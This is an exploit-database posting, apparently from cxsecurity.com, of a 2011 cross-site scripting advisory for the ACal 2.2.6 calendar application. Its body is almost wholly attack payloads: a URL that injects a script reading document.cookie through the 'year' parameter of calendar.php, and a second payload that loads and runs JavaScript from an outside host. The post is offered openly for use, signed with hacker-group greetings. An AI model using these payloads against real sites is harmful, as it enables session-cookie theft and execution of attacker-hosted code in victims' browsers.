ACal-2.2.6 XSS Vulnerability

2011.09.05
Credit: T0xic
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

================================================================= =ACal-2.2.6 XSS Vulnerability ================================================================= # Exploit Title: ACal-2.2.6 XSS Vulnerability # Date: 02.09.2011 # Author: T0xic # Category: webapps/0day # Script url: http://acalproj.sourceforge.net/ # Version: N/A # Tested on: # CVE : [ EXPL0!T ] => http://www.example.com/calendar/calendar.php?year=<script>alert(document.cookie)</script> Exemple exploit code : => ?><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT><? #================[ Exploited By T0xic ]================ #Greets To : Dz Offenders Cr3w < Algerians HaCkerS > = #======================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top